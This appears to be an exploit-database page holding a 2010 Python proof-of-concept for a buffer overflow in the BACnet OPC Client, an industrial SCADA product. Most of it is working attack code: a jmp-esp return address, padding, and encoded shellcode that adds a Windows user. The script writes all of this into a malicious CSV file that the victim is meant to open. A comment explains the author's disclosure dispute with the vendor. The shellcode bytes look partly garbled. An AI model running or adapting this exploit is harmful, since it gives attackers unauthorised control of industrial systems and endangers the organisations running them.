[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : BACnet OPC Client Buffer Overflow Exploit
# Published : 2010-09-16
# Author : Jeremy Brown
# Previous Title : DJ Studio Pro Version 8.1.3.2.1 SEH Exploit
# Next Title : Linux Kernel 2.6.27+ x86_64 compat exploit
#!/usr/bin/python
# bacnet.py
# BACnet OPC Client Buffer Overflow Exploit
# Jeremy Brown [0xjbrown41-gmail-com]
# Sept 2010
#
# After communicating via several emails with the vendor, sharing details
# about the vulnerability, as well as proof-of-concept code (I also offered
# to send the exploit code for them to test themselves), it was clear that
# they weren't very interested in fixing the vulnerability. They even ended our
# conversation with "Hi Jeremy, thanks but please don't waste my time.", and
# quickly became unresponsive to further communication. A couple days later, I
# notified them know of my plans to release exploit code to the public, proving
# the vulnerability, since they weren't planning on releasing a fix. They didn't
# respond with anything indicating plans for an update, so maybe this will help.
#
# If you are a customer (they seem to care much more about your concerns), I would
# suggest contacting support at scadaengine.com and ask them to issue a fix.
#
# Successfully tested on Windows XP Service Pack 3 with BACnet OPC CLient 1.0.24
#
import sys
import struct
ret=0x7C96BF33 # jmp esp @ user32.dll
junk="B"*185
# win32_adduser - PASS=ware EXITFUNC=thread USER=sploit Size=497 Encoder=PexAlphaNum
payload=(
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x54"
"x42x30x42x50x42x50x4bx48x45x44x4ex53x4bx58x4ex37"
"x45x30x4ax37x41x50x4fx4ex4bx58x4fx34x4ax51x4bx58"
"x4fx45x42x52x41x30x4bx4ex49x44x4bx58x46x33x4bx38"
"x41x50x50x4ex41x33x42x4cx49x49x4ex4ax46x38x42x4c"
"x46x37x47x30x41x4cx4cx4cx4dx30x41x50x44x4cx4bx4e"
"x46x4fx4bx33x46x55x46x32x46x50x45x57x45x4ex4bx58"
"x4fx55x46x42x41x30x4bx4ex48x36x4bx58x4ex30x4bx54"
"x4bx58x4fx45x4ex51x41x30x4bx4ex4bx58x4ex41x4bx48"
"x41x50x4bx4ex49x48x4ex55x46x42x46x30x43x4cx41x43"
"x42x4cx46x46x4bx58x42x44x42x53x45x38x42x4cx4ax57"
"x4ex30x4bx58x42x54x4ex30x4bx58x42x47x4ex31x4dx4a"
"x4bx58x4ax56x4ax50x4bx4ex49x30x4bx38x42x48x42x4b"
"x42x30x42x30x42x30x4bx58x4ax36x4ex43x4fx55x41x43"
"x48x4fx42x36x48x45x49x38x4ax4fx43x58x42x4cx4bx57"
"x42x35x4ax36x4fx4ex50x4cx42x4ex42x36x4ax46x4ax49"
"x50x4fx4cx48x50x30x47x35x4fx4fx47x4ex43x46x4dx36"
"x46x56x50x32x45x36x4ax57x45x46x42x32x4fx42x43x56"
"x42x42x50x36x45x36x46x57x42x52x45x57x43x47x45x36"
"x44x37x42x32x43x47x42x57x4ex36x4fx46x49x36x46x57"
"x42x32x47x37x41x46x44x57x45x46x42x42x4fx42x41x34"
"x46x34x46x44x42x32x48x42x48x42x42x52x50x36x45x56"
"x46x47x42x42x4ex46x4fx56x43x46x41x36x4ex56x47x56"
"x44x47x4fx36x45x47x42x37x42x42x41x54x46x56x4dx36"
"x49x46x50x56x49x36x43x47x46x47x44x57x41x56x46x57"
"x4fx46x44x47x43x37x42x42x43x47x42x47x4ex46x4fx36"
"x49x46x46x47x42x32x4fx32x41x34x46x34x46x34x42x50"
"x5a"
)
csv1="OPC_TAG_NAME,OBJECT_TYPE,INSTANCE,OBJECT_NAMEn\";
csv2="\scada,0,0,n";
if len(sys.argv)<2:
print "Usage: "+sys.argv[0]+" <filename.csv>"
sys.exit(0)
file=sys.argv[1]
retaddr=struct.pack("<L",ret)
csv=csv1+junk+retaddr+"X"*4+payload+csv2
try:
f=open(file,"w")
f.write(csv)
f.close()
except IOError,e:
print e
else:
print "Open %s in the OPC client to exploit the vulnerability." % file